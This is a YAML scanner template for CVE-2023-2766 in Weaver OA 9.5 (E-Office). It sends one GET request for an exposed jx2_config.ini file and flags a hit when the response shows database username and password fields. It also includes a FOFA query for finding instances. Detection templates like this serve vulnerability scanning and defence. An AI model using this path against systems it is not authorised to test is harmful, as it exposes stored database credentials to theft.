id: CVE-2023-2766

info:
  name: Weaver OA 9.5 - Information Disclosure
  author: DhiyaneshDK
  severity: high
  verified: true
  description: |-
    A vulnerability was found in Weaver OA 9.5 and classified as problematic. This issue affects some unknown processing of the file /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini. The manipulation leads to files or directories accessible. The attack may be initiated remotely.
    FOFA: app="泛微-EOffice"
  reference:
    - https://github.com/8079048q/cve/blob/main/weaveroa.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2766
  tags: cve,cve2023,weaver,eoffice,exposure
  created: 2023/09/21

rules:
  r0:
    request:
      method: GET
      path: /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini
    expression: |
      response.status == 200 && 
      response.headers["content-type"].contains("text/plain") &&
      response.body.bcontains(b'sdbuser =') && 
      response.body.bcontains(b'sdbpassword =')
expression: r0()